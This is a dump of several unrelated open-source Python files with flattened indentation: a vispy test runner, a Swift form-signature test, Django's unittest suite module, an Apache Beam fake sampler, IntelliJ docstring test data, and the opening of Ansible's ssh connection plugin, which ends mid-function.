relfilename = op.relpath(filename, import_dir)
# Open and check
try:
with open(filename, 'rb') as fid:
text = fid.read().decode('utf-8')
except UnicodeDecodeError:
continue # Probably a binary file
crcount = text.count('\r')
if crcount:
lfcount = text.count('\n')
report.append('In %s found %i/%i CR/LF' %
(relfilename, crcount, lfcount))
# Process result
if len(report) > 0:
raise RuntimeError('Found %s files with incorrect endings:\n%s'
% (len(report), '\n'.join(report)))
_script = """
import sys
import time
import warnings
import os
try:
import faulthandler
faulthandler.enable()
except Exception:
pass
os.environ['VISPY_IGNORE_OLD_VERSION'] = 'true'
import {0}
if hasattr({0}, 'canvas'):
canvas = {0}.canvas
elif hasattr({0}, 'Canvas'):
canvas = {0}.Canvas()
elif hasattr({0}, 'fig'):
canvas = {0}.fig
else:
raise RuntimeError('Bad example formatting: fix or add `# vispy: testskip`'
' to the top of the file.')
with canvas as c:
for _ in range(5):
c.update()
c.app.process_events()
time.sleep(1./60.)
"""
def _examples(fnames_str):
"""Run examples and make sure they work.
Parameters
----------
fnames_str : str
Can be a space-separated list of paths to test, or an empty string to
auto-detect and run all examples.
"""
import_dir, dev = _get_import_dir()
reason = None
if not dev:
reason = 'Cannot test examples unless in vispy git directory'
else:
with use_log_level('warning', print_msg=False):
good, backend = has_application(capable=('multi_window',))
if not good:
reason = 'Must have suitable app backend'
if reason is not None:
msg = 'Skipping example test: %s' % reason
print(msg)
raise SkipTest(msg)
# if we're given individual file paths as a string in fnames_str,
# then just use them as the fnames
# otherwise, use the full example paths that have been
# passed to us
if fnames_str:
fnames = fnames_str.split(' ')
else:
fnames = [op.join(d[0], fname)
for d in os.walk(op.join(import_dir, '..', 'examples'))
for fname in d[2] if fname.endswith('.py')]
fnames = sorted(fnames, key=lambda x: x.lower())
print(_line_sep + '\nRunning %s examples using %s backend'
% (len(fnames), backend))
op.join('tutorial', 'app', 'shared_context.py'), # non-standard
fails = []
n_ran = n_skipped = 0
t0 = time()
for fname in fnames:
n_ran += 1
root_name = op.split(fname)
root_name = op.join(op.split(op.split(root_name[0])[0])[1],
op.split(root_name[0])[1], root_name[1])
good = True
with open(fname, 'r') as fid:
for _ in range(10): # just check the first 10 lines
line = fid.readline()
if line == '':
break
elif line.startswith('# vispy: ') and 'testskip' in line:
good = False
break
if not good:
n_ran -= 1
n_skipped += 1
continue
sys.stdout.flush()
cwd = op.dirname(fname)
cmd = [sys.executable, '-c', _script.format(op.split(fname)[1][:-3])]
sys.stdout.flush()
stdout, stderr, retcode = run_subprocess(cmd, return_code=True,
cwd=cwd, env=os.environ)
if retcode or len(stderr.strip()) > 0:
# Skipping due to missing dependency is okay
if "ImportError: " in stderr:
print('S', end='')
else:
ext = '\n' + _line_sep + '\n'
fails.append('%sExample %s failed (%s):%s%s%s'
% (ext, root_name, retcode, ext, stderr, ext))
print(fails[-1])
else:
print('.', end='')
sys.stdout.flush()
print('')
t = (': %s failed, %s succeeded, %s skipped in %s seconds'
% (len(fails), n_ran - len(fails), n_skipped, round(time()-t0)))
if len(fails) > 0:
raise RuntimeError('Failed%s' % t)
print('Success%s' % t)
@nottest
def test(label='full', extra_arg_string='', coverage=False):
"""Test vispy software
Parameters
----------
label : str
Can be one of 'full', 'unit', 'nobackend', 'extra', 'lineendings',
'flake', 'docs', or any backend name (e.g., 'qt').
extra_arg_string : str
Extra arguments to sent to ``pytest``.
coverage : bool
If True, collect coverage data.
"""
if label == 'osmesa':
# Special case for OSMesa, we have to modify the VISPY_GL_LIB envvar
# before the vispy.gloo package gets imported
from ..util.osmesa_gl import fix_osmesa_gl_lib
fix_osmesa_gl_lib()
from ..app.backends import BACKEND_NAMES as backend_names
label = label.lower()
label = 'pytest' if label == 'nose' else label
known_types = ['full', 'unit', 'lineendings', 'extra', 'flake',
'docs', 'nobackend', 'examples']
if label not in known_types + backend_names:
raise ValueError('label must be one of %s, or a backend name %s, '
'not \'%s\'' % (known_types, backend_names, label))
# figure out what we actually need to run
runs = []
if label in ('full', 'unit'):
for backend in backend_names:
runs.append([partial(_unit, backend, extra_arg_string, coverage),
backend])
elif label in backend_names:
runs.append([partial(_unit, label, extra_arg_string, coverage), label])
if label in ('full', 'unit', 'nobackend'):
runs.append([partial(_unit, 'nobackend', extra_arg_string, coverage),
'nobackend'])
if label == "examples":
# take the extra arguments so that specific examples can be run
runs.append([partial(_examples, extra_arg_string),
'examples'])
elif label == 'full':
# run all the examples
runs.append([partial(_examples, ""), 'examples'])
if label in ('full', 'extra', 'lineendings'):
runs.append([_check_line_endings, 'lineendings'])
if label in ('full', 'extra', 'flake'):
runs.append([_flake, 'flake'])
if label in ('extra', 'docs'):
runs.append([_docs, 'docs'])
t0 = time()
fail = []
skip = []
for run in runs:
try:
run[0]()
except RuntimeError as exp:
print('Failed: %s' % str(exp))
fail += [run[1]]
except SkipTest:
skip += [run[1]]
except Exception as exp:
# this should only happen if we've screwed up the test setup
fail += [run[1]]
print('Failed strangely (%s): %s\n' % (type(exp), str(exp)))
import traceback
type_, value, tb = sys.exc_info()
traceback.print_exception(type_, value, tb)
else:
print('Passed\n')
sys.stdout.flush()
dt = time() - t0
stat = '%s failed, %s skipped' % (fail if fail else 0, skip if skip else 0)
extra = 'failed' if fail else 'succeeded'
print('Testing %s (%s) in %0.3f seconds' % (extra, stat, dt))
sys.stdout.flush()
if len(fail) > 0:
raise RuntimeError('FAILURE')
|
eatbyte/Swift
|
refs/heads/master
|
test/unit/cli/test_form_signature.py
|
17
|
# -*- coding: utf-8 -*-
# Copyright (c) 2014 Samuel Merritt <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import hashlib
import hmac
import mock
import unittest
from StringIO import StringIO
from swift.cli import form_signature
class TestFormSignature(unittest.TestCase):
def test_prints_signature(self):
the_time = 1406143563.020043
key = 'secret squirrel'
expires = 3600
path = '/v1/a/c/o'
redirect = 'https://example.com/done.html'
max_file_size = str(int(1024 * 1024 * 1024 * 3.14159)) # π GiB
max_file_count = '3'
expected_signature = hmac.new(
key,
"\n".join((
path, redirect, max_file_size, max_file_count,
str(int(the_time + expires)))),
hashlib.sha1).hexdigest()
out = StringIO()
with mock.patch('swift.cli.form_signature.time', lambda: the_time):
with mock.patch('sys.stdout', out):
exitcode = form_signature.main([
'/path/to/swift-form-signature',
path, redirect, max_file_size,
max_file_count, str(expires), key])
self.assertEqual(exitcode, 0)
self.assertTrue("Signature: %s" % expected_signature
in out.getvalue())
self.assertTrue("Expires: %d" % (the_time + expires,)
in out.getvalue())
sig_input = ('<input type="hidden" name="signature" value="%s" />'
% expected_signature)
self.assertTrue(sig_input in out.getvalue())
def test_too_few_args(self):
out = StringIO()
with mock.patch('sys.stdout', out):
exitcode = form_signature.main([
'/path/to/swift-form-signature',
'/v1/a/c/o', '', '12', '34', '3600'])
self.assertNotEqual(exitcode, 0)
usage = 'Syntax: swift-form-signature <path>'
self.assertTrue(usage in out.getvalue())
if __name__ == '__main__':
unittest.main()
|
ProfessionalIT/maxigenios-website
|
refs/heads/master
|
sdk/google_appengine/lib/django-1.4/django/utils/unittest/suite.py
|
353
|
"""TestSuite"""
import sys
import unittest
from django.utils.unittest import case, util
__unittest = True
class BaseTestSuite(unittest.TestSuite):
"""A simple test suite that doesn't provide class or module shared fixtures.
"""
def __init__(self, tests=()):
self._tests = []
self.addTests(tests)
def __repr__(self):
return "<%s tests=%s>" % (util.strclass(self.__class__), list(self))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return NotImplemented
return list(self) == list(other)
def __ne__(self, other):
return not self == other
# Can't guarantee hash invariant, so flag as unhashable
__hash__ = None
def __iter__(self):
return iter(self._tests)
def countTestCases(self):
cases = 0
for test in self:
cases += test.countTestCases()
return cases
def addTest(self, test):
# sanity checks
if not hasattr(test, '__call__'):
raise TypeError("%r is not callable" % (repr(test),))
if isinstance(test, type) and issubclass(test,
(case.TestCase, TestSuite)):
raise TypeError("TestCases and TestSuites must be instantiated "
"before passing them to addTest()")
self._tests.append(test)
def addTests(self, tests):
if isinstance(tests, basestring):
raise TypeError("tests must be an iterable of tests, not a string")
for test in tests:
self.addTest(test)
def run(self, result):
for test in self:
if result.shouldStop:
break
test(result)
return result
def __call__(self, *args, **kwds):
return self.run(*args, **kwds)
def debug(self):
"""Run the tests without collecting errors in a TestResult"""
for test in self:
test.debug()
class TestSuite(BaseTestSuite):
"""A test suite is a composite test consisting of a number of TestCases.
For use, create an instance of TestSuite, then add test case instances.
When all tests have been added, the suite can be passed to a test
runner, such as TextTestRunner. It will run the individual test cases
in the order in which they were added, aggregating the results. When
subclassing, do not forget to call the base class constructor.
"""
def run(self, result):
self._wrapped_run(result)
self._tearDownPreviousClass(None, result)
self._handleModuleTearDown(result)
return result
def debug(self):
"""Run the tests without collecting errors in a TestResult"""
debug = _DebugResult()
self._wrapped_run(debug, True)
self._tearDownPreviousClass(None, debug)
self._handleModuleTearDown(debug)
################################
# private methods
def _wrapped_run(self, result, debug=False):
for test in self:
if result.shouldStop:
break
if _isnotsuite(test):
self._tearDownPreviousClass(test, result)
self._handleModuleFixture(test, result)
self._handleClassSetUp(test, result)
result._previousTestClass = test.__class__
if (getattr(test.__class__, '_classSetupFailed', False) or
getattr(result, '_moduleSetUpFailed', False)):
continue
if hasattr(test, '_wrapped_run'):
test._wrapped_run(result, debug)
elif not debug:
test(result)
else:
test.debug()
def _handleClassSetUp(self, test, result):
previousClass = getattr(result, '_previousTestClass', None)
currentClass = test.__class__
if currentClass == previousClass:
return
if result._moduleSetUpFailed:
return
if getattr(currentClass, "__unittest_skip__", False):
return
try:
currentClass._classSetupFailed = False
except TypeError:
# test may actually be a function
# so its class will be a builtin-type
pass
setUpClass = getattr(currentClass, 'setUpClass', None)
if setUpClass is not None:
try:
setUpClass()
except Exception, e:
if isinstance(result, _DebugResult):
raise
currentClass._classSetupFailed = True
className = util.strclass(currentClass)
errorName = 'setUpClass (%s)' % className
self._addClassOrModuleLevelException(result, e, errorName)
def _get_previous_module(self, result):
previousModule = None
previousClass = getattr(result, '_previousTestClass', None)
if previousClass is not None:
previousModule = previousClass.__module__
return previousModule
def _handleModuleFixture(self, test, result):
previousModule = self._get_previous_module(result)
currentModule = test.__class__.__module__
if currentModule == previousModule:
return
self._handleModuleTearDown(result)
result._moduleSetUpFailed = False
try:
module = sys.modules[currentModule]
except KeyError:
return
setUpModule = getattr(module, 'setUpModule', None)
if setUpModule is not None:
try:
setUpModule()
except Exception, e:
if isinstance(result, _DebugResult):
raise
result._moduleSetUpFailed = True
errorName = 'setUpModule (%s)' % currentModule
self._addClassOrModuleLevelException(result, e, errorName)
def _addClassOrModuleLevelException(self, result, exception, errorName):
error = _ErrorHolder(errorName)
addSkip = getattr(result, 'addSkip', None)
if addSkip is not None and isinstance(exception, case.SkipTest):
addSkip(error, str(exception))
else:
result.addError(error, sys.exc_info())
def _handleModuleTearDown(self, result):
previousModule = self._get_previous_module(result)
if previousModule is None:
return
if result._moduleSetUpFailed:
return
try:
module = sys.modules[previousModule]
except KeyError:
return
tearDownModule = getattr(module, 'tearDownModule', None)
if tearDownModule is not None:
try:
tearDownModule()
except Exception, e:
if isinstance(result, _DebugResult):
raise
errorName = 'tearDownModule (%s)' % previousModule
self._addClassOrModuleLevelException(result, e, errorName)
def _tearDownPreviousClass(self, test, result):
previousClass = getattr(result, '_previousTestClass', None)
currentClass = test.__class__
if currentClass == previousClass:
return
if getattr(previousClass, '_classSetupFailed', False):
return
if getattr(result, '_moduleSetUpFailed', False):
return
if getattr(previousClass, "__unittest_skip__", False):
return
tearDownClass = getattr(previousClass, 'tearDownClass', None)
if tearDownClass is not None:
try:
tearDownClass()
except Exception, e:
if isinstance(result, _DebugResult):
raise
className = util.strclass(previousClass)
errorName = 'tearDownClass (%s)' % className
self._addClassOrModuleLevelException(result, e, errorName)
class _ErrorHolder(object):
"""
Placeholder for a TestCase inside a result. As far as a TestResult
is concerned, this looks exactly like a unit test. Used to insert
arbitrary errors into a test suite run.
"""
# Inspired by the ErrorHolder from Twisted:
# http://twistedmatrix.com/trac/browser/trunk/twisted/trial/runner.py
# attribute used by TestResult._exc_info_to_string
failureException = None
def __init__(self, description):
self.description = description
def id(self):
return self.description
def shortDescription(self):
return None
def __repr__(self):
return "<ErrorHolder description=%r>" % (self.description,)
def __str__(self):
return self.id()
def run(self, result):
# could call result.addError(...) - but this test-like object
# shouldn't be run anyway
pass
def __call__(self, result):
return self.run(result)
def countTestCases(self):
return 0
def _isnotsuite(test):
"A crude way to tell apart testcases and suites with duck-typing"
try:
iter(test)
except TypeError:
return True
return False
class _DebugResult(object):
"Used by the TestSuite to hold previous class when running in debug."
_previousTestClass = None
_moduleSetUpFailed = False
shouldStop = False
|
dhalperi/beam
|
refs/heads/master
|
sdks/python/apache_beam/runners/worker/statesampler_fake.py
|
10
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This module is experimental. No backwards-compatibility guarantees.
class StateSampler(object):
def __init__(self, *args, **kwargs):
pass
def scoped_state(self, name):
return _FakeScopedState()
class _FakeScopedState(object):
def __enter__(self):
pass
def __exit__(self, *unused_args):
pass
|
leafclick/intellij-community
|
refs/heads/master
|
python/testData/codeInsight/smartEnter/docTypeRType_after.py
|
83
|
def foo(a):
"""
<caret>
@param a:
@type a:
@return:
@rtype:
"""
pass
def foo1():
"""
:return :
"""
|
nrwahl2/ansible
|
refs/heads/devel
|
lib/ansible/plugins/connection/ssh.py
|
4
|
# (c) 2012, Michael DeHaan <[email protected]>
# Copyright 2015 Abhijit Menon-Sen <[email protected]>
# Copyright 2017 Toshio Kuratomi <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
'''
DOCUMENTATION:
connection: ssh
short_description: connect via ssh client binary
description:
- This connection plugin allows ansible to communicate to the target machines via normal ssh command line.
author: ansible (@core)
version_added: historical
options:
host:
description: Hostname/ip to connect to.
default: inventory_hostname
vars:
- name: ansible_host
- name: ansible_ssh_host
host_key_checking:
constants:
- name: HOST_KEY_CHECKING
description: Determines if ssh should check host keys
type: boolean
ini:
- section: defaults
key: 'host_key_checking'
env:
- name: ANSIBLE_HOST_KEY_CHECKING
password:
description: Authentication password for the C(remote_user). Can be supplied as CLI option.
vars:
- name: ansible_password
- name: ansible_ssh_pass
ssh_args:
description: Arguments to pass to all ssh cli tools
default: '-C -o ControlMaster=auto -o ControlPersist=60s'
ini:
- section: 'ssh_connection'
key: 'ssh_args'
env:
- name: ANSIBLE_SSH_ARGS
ssh_common_args:
description: Common extra args for all ssh CLI tools
vars:
- name: ansible_ssh_common_args
ssh_executable:
default: ssh
description:
- This defines the location of the ssh binary. It defaults to `ssh` which will use the first ssh binary available in $PATH.
- This option is usually not required, it might be useful when access to system ssh is restricted,
or when using ssh wrappers to connect to remote hosts.
env: [{name: ANSIBLE_SSH_EXECUTABLE}]
ini:
- {key: ssh_executable, section: ssh_connection}
yaml: {key: ssh_connection.ssh_executable}
const:
- name: ANSIBLE_SSH_EXECUTABLE
version_added: "2.2"
scp_extra_args:
description: Extra exclusive to the 'scp' CLI
vars:
- name: ansible_scp_extra_args
sftp_extra_args:
description: Extra exclusive to the 'sftp' CLI
vars:
- name: ansible_sftp_extra_args
ssh_extra_args:
description: Extra exclusive to the 'ssh' CLI
vars:
- name: ansible_ssh_extra_args
ssh_retries:
# constant: ANSIBLE_SSH_RETRIES
description: Number of attempts to connect.
default: 3
env:
- name: ANSIBLE_SSH_RETRIES
ini:
- section: connection
key: retries
- section: ssh_connection
key: retries
port:
description: Remote port to connect to.
type: int
default: 22
ini:
- section: defaults
key: remote_port
env:
- name: ANSIBLE_REMOTE_PORT
vars:
- name: ansible_port
- name: ansible_ssh_port
remote_user:
description:
- User name with which to login to the remote server, normally set by the remote_user keyword.
- If no user is supplied, Ansible will let the ssh client binary choose the user as it normally
ini:
- section: defaults
key: remote_user
env:
- name: ANSIBLE_REMOTE_USER
vars:
- name: ansible_user
- name: ansible_ssh_user
pipelining:
default: ANSIBLE_PIPELINING
description:
- Pipelining reduces the number of SSH operations required to execute a module on the remote server,
by executing many Ansible modules without actual file transfer.
- This can result in a very significant performance improvement when enabled.
- However this conflicts with privilege escalation (become).
For example, when using sudo operations you must first disable 'requiretty' in the sudoers file for the target hosts,
which is why this feature is disabled by default.
env: [{name: ANSIBLE_SSH_PIPELINING}]
ini:
- {key: pipelining, section: ssh_connection}
type: boolean
vars: [{name: ansible_ssh_pipelining}]
# TODO:
# ANSIBLE_SSH_RETRIES
# self._play_context.private_key_file
# ANSIBLE_SSH_CONTROL_PATH
# ANSIBLE_SSH_CONTROL_PATH_DIR
# DEFAULT_SFTP_BATCH_MODE
# DEFAULT_SCP_IF_SSH
'''
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import errno
import fcntl
import hashlib
import os
import pty
import socket
import subprocess
import time
from functools import wraps
from ansible import constants as C
from ansible.errors import AnsibleError, AnsibleConnectionFailure, AnsibleFileNotFound
from ansible.errors import AnsibleOptionsError
from ansible.compat import selectors
from ansible.module_utils.six import PY3, text_type, binary_type
from ansible.module_utils.six.moves import shlex_quote
from ansible.module_utils._text import to_bytes, to_native, to_text
from ansible.module_utils.parsing.convert_bool import BOOLEANS, boolean
from ansible.plugins.connection import ConnectionBase, BUFSIZE
from ansible.utils.path import unfrackpath, makedirs_safe
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
SSHPASS_AVAILABLE = None
class AnsibleControlPersistBrokenPipeError(AnsibleError):
''' ControlPersist broken pipe '''
pass
def _ssh_retry(func):
"""
Decorator to retry ssh/scp/sftp in the case of a connection failure
Will retry if:
* an exception is caught
* ssh returns 255
Will not retry if
* remaining_tries is <2
* retries limit reached
"""
@wraps(func)
def wrapped(self, *args, **kwargs):
remaining_tries = int(C.ANSIBLE_SSH_RETRIES) + 1
cmd_summary = "%s..." % args[0]
for attempt in range(remaining_tries):
try:
try:
return_tuple = func(self, *args, **kwargs)
display.vvv(return_tuple, host=self.host)
# 0 = success
# 1-254 = remote command return code
# 255 = failure from the ssh command itself
except (AnsibleControlPersistBrokenPipeError) as e:
# Retry one more time because of the ControlPersist broken pipe (see #16731)
display.vvv(u"RETRYING BECAUSE OF CONTROLPERSIST BROKEN PIPE")
return_tuple = func(self, *args, **kwargs)
if return_tuple[0] != 255:
break
else:
raise AnsibleConnectionFailure("Failed to connect to the host via ssh: %s" % to_native(return_tuple[2]))
except (AnsibleConnectionFailure, Exception) as e:
if attempt == remaining_tries - 1:
raise
else:
pause = 2 ** attempt - 1
if pause > 30:
pause = 30
if isinstance(e, AnsibleConnectionFailure):
msg = "ssh_retry: attempt: %d, ssh return code is 255. cmd (%s), pausing for %d seconds" % (attempt, cmd_summary, pause)
else:
msg = "ssh_retry: attempt: %d, caught exception(%s) from cmd (%s), pausing for %d seconds" % (attempt, e, cmd_summary, pause)
display.vv(msg, host=self.host)
time.sleep(pause)
continue
return return_tuple
return wrapped
class Connection(ConnectionBase):
''' ssh based connections '''
transport = 'ssh'
has_pipelining = True
become_methods = frozenset(C.BECOME_METHODS).difference(['runas'])
def __init__(self, *args, **kwargs):
super(Connection, self).__init__(*args, **kwargs)
self.host = self._play_context.remote_addr
self.port = self._play_context.port
self.user = self._play_context.remote_user
self.control_path = C.ANSIBLE_SSH_CONTROL_PATH
self.control_path_dir = C.ANSIBLE_SSH_CONTROL_PATH_DIR
# The connection is created by running ssh/scp/sftp from the exec_command,
# put_file, and fetch_file methods, so we don't need to do any connection
# management here.
def _connect(self):
return self
def transport_test(self, connect_timeout):
''' Test the transport mechanism, if available '''
port = int(self.port or 22)
display.vvv("attempting transport test to %s:%s" % (self.host, port))
sock = socket.create_connection((self.host, port), connect_timeout)
sock.close()
@staticmethod
def _create_control_path(host, port, user):
'''Make a hash for the controlpath based on con attributes'''
pstring = '%s-%s-%s' % (host, port, user)
m = hashlib.sha1()
m.update(to_bytes(pstring))
digest = m.hexdigest()
cpath = '%(directory)s/' + digest[:10]
return cpath
@staticmethod
def _sshpass_available():
global SSHPASS_AVAILABLE
# We test once if sshpass is available, and remember the result. It
# would be nice to use distutils.spawn.find_executable for this, but
# distutils isn't always available; shutils.which() is Python3-only.
if SSHPASS_AVAILABLE is None:
try:
p = subprocess.Popen(["sshpass"], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p.communicate()
SSHPASS_AVAILABLE = True
except OSError:
SSHPASS_AVAILABLE = False
return SSHPASS_AVAILABLE
@staticmethod
def _persistence_controls(b_command):
'''
Takes a command array and scans it for ControlPersist and ControlPath
settings and returns two booleans indicating whether either was found.
This could be smarter, e.g. returning false if ControlPersist is 'no',
but for now we do it simple way.
'''
controlpersist = False
controlpath = False
for b_arg in (a.lower() for a in b_command):
if b'controlpersist' in b_arg:
controlpersist = True
elif b'controlpath' in b_arg:
controlpath = True
return controlpersist, controlpath
def _add_args(self, b_command, b_args, explanation):
"""
Adds arguments to the ssh command and displays a caller-supplied explanation of why.
:arg b_command: A list containing the command to add the new arguments to.
This list will be modified by this method.
:arg b_args: An iterable of new arguments to add. This iterable is used
more than once so it must be persistent (ie: a list is okay but a
StringIO would not)
:arg explanation: A text string containing explaining why the arguments
were added. It will be displayed with a high enough verbosity.
.. note:: This function does its work via side-effect. The b_command list has the new arguments appended.
"""
display.vvvvv(u'SSH: %s: (%s)' % (explanation, ')('.join(to_text(a) for a in b_args)), host=self._play_context.remote_addr)
b_command += b_args
def _build_command(self, binary, *other_args):
'''
Takes a binary (ssh, scp, sftp) and optional extra arguments and returns
a command line as an array that can be passed to subprocess.Popen.
'''
b_command = []
#
# First, the command to invoke
#
# If we want to use password authentication, we have to set up a pipe to
# write the password to sshpass.
if self._play_context.password:
if not self._sshpass_available():
raise AnsibleError("to use the 'ssh' connection type with passwords, you must install the sshpass program")
self.sshpass_pipe = os.pipe()
b_command += [b'sshpass', b'-d' + to_bytes(self.sshpass_pipe[0], nonstring='simplerepr', errors='surrogate_or_strict')]
if binary == 'ssh':
b_command += [to_bytes(self._play_context.ssh_executable, errors='surrogate_or_strict')]
else:
b_command += [to_bytes(binary, errors='surrogate_or_strict')]
#
# Next, additional arguments based on the configuration.
#
# sftp batch mode allows us to correctly catch failed transfers, but can
# be disabled if the client side doesn't support the option. However,
# sftp batch mode does not prompt for passwords so it must be disabled
# if not using controlpersist and using sshpass
if binary == 'sftp' and C.DEFAULT_SFTP_BATCH_MODE:
if self._play_context.password:
b_args = [b'-o', b'BatchMode=no']
self._add_args(b_command, b_args, u'disable batch mode for sshpass')
b_command += [b'-b', b'-']
if self._play_context.verbosity > 3:
b_command.append(b'-vvv')
#
# Next, we add [ssh_connection]ssh_args from ansible.cfg.
#
if self._play_context.ssh_args:
b_args = [to_bytes(a, errors='surrogate_or_strict') for a in
self._split_ssh_args(self._play_context.ssh_args)]
self._add_args(b_command, b_args, u"ansible.cfg set ssh_args")
# Now we add various arguments controlled by configuration file settings
# (e.g. host_key_checking) or inventory variables (ansible_ssh_port) or
# a combination thereof.
if not C.HOST_KEY_CHECKING:
b_args = (b"-o", b"StrictHostKeyChecking=no")
self._add_args(b_command, b_args, u"ANSIBLE_HOST_KEY_CHECKING/host_key_checking disabled")
if self._play_context.port is not None:
b_args = (b"-o", b"Port=" + to_bytes(self._play_context.port, nonstring='simplerepr', errors='surrogate_or_strict'))
self._add_args(b_command, b_args, u"ANSIBLE_REMOTE_PORT/remote_port/ansible_port set")
key = self._play_context.private_key_file
if key:
b_args = (b"-o", b'IdentityFile="' + to_bytes(os.path.expanduser(key), errors='surrogate_or_strict') + b'"')
self._add_args(b_command, b_args, u"ANSIBLE_PRIVATE_KEY_FILE/private_key_file/ansible_ssh_private_key_file set")
if not self._play_context.password:
self._add_args(
b_command, (
b"-o", b"KbdInteractiveAuthentication=no",
b"-o", b"PreferredAuthentications=gssapi-with-mic,gssapi-keyex,hostbased,publickey",
b"-o", b"PasswordAuthentication=no"
),
u"ansible_password/ansible_ssh_pass not set"
)
user = self._play_context.remote_user
if user:
self._add_args(
b_command,
(b"-o", b"User=" + to_bytes(self._play_context.remote_user, errors='surrogate_or_strict')),
u"ANSIBLE_REMOTE_USER/remote_user/ansible_user/user/-u set"
)
self._add_args(
b_command,
(b"-o", b"ConnectTimeout=" + to_bytes(self._play_context.timeout, errors='surrogate_or_strict', nonstring='simplerepr')),
u"ANSIBLE_TIMEOUT/timeout set"
)
# Add in any common or binary-specific arguments from the PlayContext
# (i.e. inventory or task settings or overrides on the command line).
for opt in (u'ssh_common_args', u'{0}_extra_args'.format(binary)):
attr = getattr(self._play_context, opt, None)
if attr is not None:
b_args = [to_bytes(a, errors='surrogate_or_strict') for a in self._split_ssh_args(attr)]
self._add_args(b_command, b_args, u"PlayContext set %s" % opt)
# Check if ControlPersist is enabled and add a ControlPath if one hasn't
# already been set.
controlpersist, controlpath = self._persistence_controls(b_command)
if controlpersist:
self._persistent = True
if not controlpath:
cpdir = unfrackpath(self.control_path_dir)
b_cpdir = to_bytes(cpdir, errors='surrogate_or_strict')
# The directory must exist and be writable.
makedirs_safe(b_cpdir, 0o700)
if not os.access(b_cpdir, os.W_OK):
raise AnsibleError("Cannot write to ControlPath %s" % to_native(cpdir))
if not self.control_path:
self.control_path = self._create_control_path(
self.host,
self.port,
self.user
)
b_args = (b"-o", b"ControlPath=" + to_bytes(self.control_path % dict(directory=cpdir), errors='surrogate_or_strict'))
self._add_args(b_command, b_args, u"found only ControlPersist; added ControlPath")
# Finally, we add any caller-supplied extras.
if other_args:
b_command += [to_bytes(a) for a in other_args]
return b_command
def _send_initial_data(self, fh, in_data):
'''
Writes initial data to the stdin filehandle of the subprocess and closes
it. (The handle must be closed; otherwise, for example, "sftp -b -" will
just hang forever waiting for more commands.)
'''
display.debug('Sending initial data')
try:
fh.write(to_bytes(in_data))
fh.close()
except (OSError, IOError):
raise AnsibleConnectionFailure('SSH Error: data could not be sent to remote host "%s". Make sure this host can be reached over ssh' % self.host)
display.debug('Sent initial data (%d bytes)' % len(in_data))
# Used by _run() to kill processes on failures
@staticmethod
def _terminate_process(p):
""" Terminate a process, ignoring errors """
try:
p.terminate()
except (OSError, IOError):
pass
# This is separate from _run() because we need to do the same thing for stdout
# and stderr.
def _examine_output(self, source, state, b_chunk, sudoable):
'''
Takes a string, extracts complete lines from it, tests to see if they
are a prompt, error message, etc., and sets appropriate flags in self.
Prompt and success lines are removed.
Returns the processed (i.e. possibly-edited) output and the unprocessed
remainder (to be processed with the next chunk) as strings.
'''
output = []
for b_line in b_chunk.splitlines(True):
display_line = to_text(b_line).rstrip('\r\n')
suppress_output = False
# display.debug("Examining line (source=%s, state=%s): '%s'" % (source, state, display_line))
if self._play_context.prompt and self.check_password_prompt(b_line):
display.debug("become_prompt: (source=%s, state=%s): '%s'" % (source, state, display_line))
self._flags['become_prompt'] = True
suppress_output = True
elif self._play_context.success_key and self.check_become_success(b_line):
display.debug("become_success: (source=%s, state=%s): '%s'" % (source, state, display_line))
self._flags['become_success'] = True
suppress_output = True
elif sudoable and self.check_incorrect_password(b_line):
display.debug("become_error: (source=%s, state=%s): '%s'" % (source, state, display_line))
self._flags['become_error'] = True
elif sudoable and self.check_missing_password(b_line):
display.debug("become_nopasswd_error: (source=%s, state=%s): '%s'" % (source, state, display_line))
self._flags['become_nopasswd_error'] = True
if not suppress_output:
output.append(b_line)
# The chunk we read was most likely a series of complete lines, but just
# in case the last line was incomplete (and not a prompt, which we would
# have removed from the output), we retain it to be processed with the
# next chunk.
remainder = b''
if output and not output[-1].endswith(b'\n'):
remainder = output[-1]
output = output[:-1]
return b''.join(output), remainder
def _bare_run(self, cmd, in_data, sudoable=True, checkrc=True):
'''
Starts the command and communicates with it until it ends.
'''
display_cmd = list(map(shlex_quote, map(to_text, cmd)))
display.vvv(u'SSH: EXEC {0}'.format(u' '.join(display_cmd)), host=self.host)
# Start the given command. If we don't need to pipeline data, we can try
# to use a pseudo-tty (ssh will have been invoked with -tt). If we are
# pipelining data, or can't create a pty, we fall back to using plain
# old pipes.
p = None
if isinstance(cmd, (text_type, binary_type)):
cmd = to_bytes(cmd)
else:
cmd = list(map(to_bytes, cmd))
if not in_data:
try:
# Make sure stdin is a proper pty to avoid tcgetattr errors
master, slave = pty.openpty()
if PY3 and self._play_context.password:
p = subprocess.Popen(cmd, stdin=slave, stdout=subprocess.PIPE, stderr=subprocess.PIPE, pass_fds=self.sshpass_pipe)
else:
p = subprocess.Popen(cmd, stdin=slave, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
